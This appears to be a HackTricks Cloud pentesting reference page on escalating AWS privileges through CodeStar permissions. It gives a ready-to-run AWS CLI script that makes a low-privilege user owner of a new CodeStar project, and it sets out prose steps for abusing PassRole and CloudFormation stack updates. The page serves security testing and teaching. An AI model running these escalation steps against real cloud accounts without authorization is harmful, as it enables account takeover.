HackTricks Cloud
HackTricks Cloud
Ask or search…
⌃K
Links

AWS - Codestar Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:

Codestar

You can find more information about codestar in:

iam:PassRole, codestar:CreateProject

With these permissions you can abuse a codestar IAM Role to perform arbitrary actions through a cloudformation template. Check the following page:

codestar:CreateProject, codestar:AssociateTeamMember

This technique uses codestar:CreateProject to create a codestar project, and codestar:AssociateTeamMember to make an IAM user the owner of a new CodeStar project, which will grant them a new policy with a few extra permissions.
PROJECT_NAME="supercodestar"
​
aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME
​
echo "Waiting 1min to start the project"
sleep 60
​
USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')
​
aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
--project-id $PROJECT_NAME \
--user-arn "$USER_ARN" \
--project-role "Owner" \
--remote-access-allowed
If you are already a member of the project you can use the permission codestar:UpdateTeamMember to update your role to owner instead of codestar:AssociateTeamMember
Potential Impact: Privesc to the codestar policy generated. You can find an example of that policy in:

codestar:CreateProjectFromTemplate

  1. 1.
    Create a New Project:
    • Utilize the codestar:CreateProjectFromTemplate action to initiate the creation of a new project.
      • Upon successful creation, access is automatically granted for cloudformation:UpdateStack.
      • This access specifically targets a stack associated with the CodeStarWorker-<generic project name>-CloudFormation IAM role.
  2. 2.
    Update the Target Stack:
    • With the granted CloudFormation permissions, proceed to update the specified stack.
      • The stack's name will typically conform to one of two patterns:
        • awscodestar-<generic project name>-infrastructure
        • awscodestar-<generic project name>-lambda
        • The exact name depends on the chosen template (referencing the example exploit script).
  3. 3.
    Access and Permissions:
    • Post-update, you obtain the capabilities assigned to the CloudFormation IAM role linked with the stack.
    • Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.
Potential Impact: Privesc to cloudformation IAM role.
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks: